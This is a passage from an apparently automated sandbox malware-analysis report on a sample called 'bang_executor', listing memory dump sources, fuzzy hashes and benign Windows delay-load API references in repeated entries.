                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DloadProtectSection
                                        • String ID:
                                        • API String ID: 2203082970-0
                                        • Opcode ID: 331663c4dce9f9dda97b77d4b969fc3caf796d48251742d635aca97e43ba08b1
                                        • Instruction ID: cb39d0cbc5503cb795ae25b69e9b69e97f29e583adeb3d7179226999123d891b
                                        • Opcode Fuzzy Hash: 331663c4dce9f9dda97b77d4b969fc3caf796d48251742d635aca97e43ba08b1
                                        • Instruction Fuzzy Hash: 79D01234E01B099FD219EB64DC8EBAC3E90BB6971CFD82800B505990D6E7B099C4A616
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,004EB18A,?,?,?,00000000,004EB662,?,?,00000000,?,?), ref: 004EB294
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: 5e532f564d4e4a8420cb35db030347b4f463cb4132d968e2cf818395bfe0ac06
                                        • Instruction ID: ee88e2d1354064fbb543172f34f5e0a7981f370aafa65b9673361b396d7be22c
                                        • Opcode Fuzzy Hash: 5e532f564d4e4a8420cb35db030347b4f463cb4132d968e2cf818395bfe0ac06
                                        • Instruction Fuzzy Hash: F5C01234400144954E304726A84D49F7311DF523677B482D5C168851A1C3278C47F644
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 5f7adb0528641d5efd85b8ff8e5a769ec8f75a7422709ad7b92c8930787abd36
                                        • Instruction ID: 8057e781a0f3f5d8a1fc1c8c541deea28b11ec2519419ed607a2528ae2b34d6b
                                        • Opcode Fuzzy Hash: 5f7adb0528641d5efd85b8ff8e5a769ec8f75a7422709ad7b92c8930787abd36
                                        • Instruction Fuzzy Hash: AAB0129635C407BE712411449C06D7F0D0CF6C0B14B31AE3AF004C00C094401C404132
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                         • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 59961ac96039edc467f8aade6d02598a7c8cbda557e8e003b76dd739ecfd2c8f
                                        • Instruction ID: fcd256fa940cdef626d1e9593c32d1829d9c62a401873ec20680547bafb94c7f
                                        • Opcode Fuzzy Hash: 59961ac96039edc467f8aade6d02598a7c8cbda557e8e003b76dd739ecfd2c8f
                                        • Instruction Fuzzy Hash: 26B0129635C443AD711855489C06E7F0D8CF7C4B14B30E93AF408C01C0D4401C484232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: fecca9a307dd63ed332f070901d5d64e72656a5e0746c9f97711b7c233e4e1a5
                                        • Instruction ID: 1f3494707cac3b49d2577de25137dd120748b01faab35812160a05fa51894f21
                                        • Opcode Fuzzy Hash: fecca9a307dd63ed332f070901d5d64e72656a5e0746c9f97711b7c233e4e1a5
                                        • Instruction Fuzzy Hash: 28B0129635C543AD725851489C06E7F0D4CF7C4B14B30EE3AF008C01C0D4401C844232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 79f55242cb1051d2bb16f2d1cb7480eeafd217bce57192eb6eaf7398520c6d88
                                        • Instruction ID: 30ec83529867e5ca4291ffcc4877932c156f31b3f2a92f9f9269573a893ec704
                                        • Opcode Fuzzy Hash: 79f55242cb1051d2bb16f2d1cb7480eeafd217bce57192eb6eaf7398520c6d88
                                        • Instruction Fuzzy Hash: 43B0129A35C507AE71145148DC06E7F0D4CF6C4B14B30AD3AF008C11C0D4401C404332
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 642690cc4f4480c2677655a307068146bd0c7a6c279e32d78b098e1ec9be9000
                                        • Instruction ID: 91eb20eeaf37d0056771bef4d4e67da7244b91457d6317bd69a45d51fb97dffc
                                        • Opcode Fuzzy Hash: 642690cc4f4480c2677655a307068146bd0c7a6c279e32d78b098e1ec9be9000
                                        • Instruction Fuzzy Hash: D1B0129635C403AD711851989C06E7F0D4CF7C4B14B30ED3AF008C01C0D4401C444232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 4101ab6fcb1af6f863876b590923764214415df694f90e6c26690ef8bffe5bf7
                                        • Instruction ID: ac18e716a0dd4d5cc5c878e31f7b22f839c72ce8ca9e6728399cd0ab887454da
                                        • Opcode Fuzzy Hash: 4101ab6fcb1af6f863876b590923764214415df694f90e6c26690ef8bffe5bf7
                                        • Instruction Fuzzy Hash: 18B012A635C443AD711451489C06E7F0D4CF6C4B14B30FA3AF408C00C0D4401C445232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 04c0e9ce5bbd86360bc2fd3f79b2052dbcd56bf4cc07ad8fecb1d6c978d12dcd
                                        • Instruction ID: 6c7379acbc64338742d1b9ac5b03856f01bb642a9d5a7d5e6a4d495c0cc8061b
                                        • Opcode Fuzzy Hash: 04c0e9ce5bbd86360bc2fd3f79b2052dbcd56bf4cc07ad8fecb1d6c978d12dcd
                                        • Instruction Fuzzy Hash: 66B0129635C403AD711851489D06E7F0D4CF7C4B14B30E93AF408C01C0D4411C494232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 106517d8d8f883bfcd92d72141416a01d3443c11596be89a8ff8c4432394951a
                                        • Instruction ID: ebd3000854d8a6b212ac9ba241aa9bb1ec09889afb0785556b46a35795fd061b
                                        • Opcode Fuzzy Hash: 106517d8d8f883bfcd92d72141416a01d3443c11596be89a8ff8c4432394951a
                                        • Instruction Fuzzy Hash: B0B012A635C403AD71145148DD06E7F0D5CF6C4B14B30AB7AF408C00C0D4411C414232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: e1879ad6907b1ef1e117fdf3ed2e464d102435015a13de3a057ac4d8a50cf00a
                                        • Instruction ID: 8deb5b7e68127e3321f7c78935b883635f0ddc422b2351f12072f90f818b5bcf
                                        • Opcode Fuzzy Hash: e1879ad6907b1ef1e117fdf3ed2e464d102435015a13de3a057ac4d8a50cf00a
                                        • Instruction Fuzzy Hash: 58B0129A35C603AE72545148DC06E7F0D4CF6C4B14B30AA3AF008C11C0D4401C808232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: ff3b7013756394590dcd06c24988067731d00296af6aea4a192b08759cab09cf
                                        • Instruction ID: cb51b3ebbe8b963d1b0b4ba3006935a55e327ab85aa54cd5578e7cd35c5ff597
                                        • Opcode Fuzzy Hash: ff3b7013756394590dcd06c24988067731d00296af6aea4a192b08759cab09cf
                                        • Instruction Fuzzy Hash: 54B012A636C503AD71145188DC06E7F0D5CF6C4B14B30AE3BF008C00C0D4401C404232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 519871cac7c7d78218273647396807fd3890f804e8925de517f1b59785fbccc9
                                        • Instruction ID: d55086f80a17239163e98cb6e92ff19b313ae600ab119b9730639cac6be1a67a
                                        • Opcode Fuzzy Hash: 519871cac7c7d78218273647396807fd3890f804e8925de517f1b59785fbccc9
                                        • Instruction Fuzzy Hash: 0CB0129A35C543AE71145148DC06E7F0D4CF6C4B14B30E93AF408C11C0D4402C444232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 73d0effbaafac091014d3a5966c2ab2514bf41eb884d1eb2a68dfd0a8465e7e5
                                        • Instruction ID: 761c8be3bc1dee43b41e8ce72881910b703c0741b5bdabdc3f493abf6ea33d29
                                        • Opcode Fuzzy Hash: 73d0effbaafac091014d3a5966c2ab2514bf41eb884d1eb2a68dfd0a8465e7e5
                                        • Instruction Fuzzy Hash: 4DB012A635C403AD711851489D06E7F0DCCF6C4B14F30A93AF408C00C0D4411C414232
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0050068E
                                          • Part of subcall function 00500D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00500DAD
                                          • Part of subcall function 00500D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00500DBE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 45dfc76241e60c398f9a32df71320b60663e98f8ac0127ed813aa1a3eef5872c
                                        • Instruction ID: 2fa02796d079813a5ccd9a80d71a8de9aa5f7fff5e4c860d9c853eb59753a646
                                        • Opcode Fuzzy Hash: 45dfc76241e60c398f9a32df71320b60663e98f8ac0127ed813aa1a3eef5872c
                                        • Instruction Fuzzy Hash: 71B012A635C403AD711451499C06E7F0D4CF6C4B14B30BD3AF008C00C1D4401C405232
                                        Uniqueness

